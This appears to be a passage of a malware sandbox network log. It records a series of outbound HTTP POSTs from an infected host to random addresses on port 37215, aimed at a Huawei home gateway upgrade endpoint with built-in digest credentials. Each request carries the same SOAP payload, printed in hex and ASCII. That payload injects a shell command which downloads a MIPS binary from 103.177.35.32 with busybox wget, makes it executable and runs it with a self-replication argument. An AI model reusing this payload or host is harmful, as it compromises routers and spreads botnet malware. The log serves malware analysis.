                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        217192.168.2.2336872157.2.101.11437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315428972 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        218192.168.2.2344474119.19.85.137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315439939 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        219192.168.2.2359300197.185.227.21137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315496922 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        220192.168.2.2355410201.87.48.1737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315498114 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        221192.168.2.2344476157.91.216.20137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315507889 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        222192.168.2.2357626197.111.46.9837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315515995 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        223192.168.2.2351118157.54.103.24537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315516949 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        224192.168.2.2345950157.190.169.18837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315515995 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        225192.168.2.235221641.222.216.19937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315619946 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        226192.168.2.2341586157.148.145.6737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315634966 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
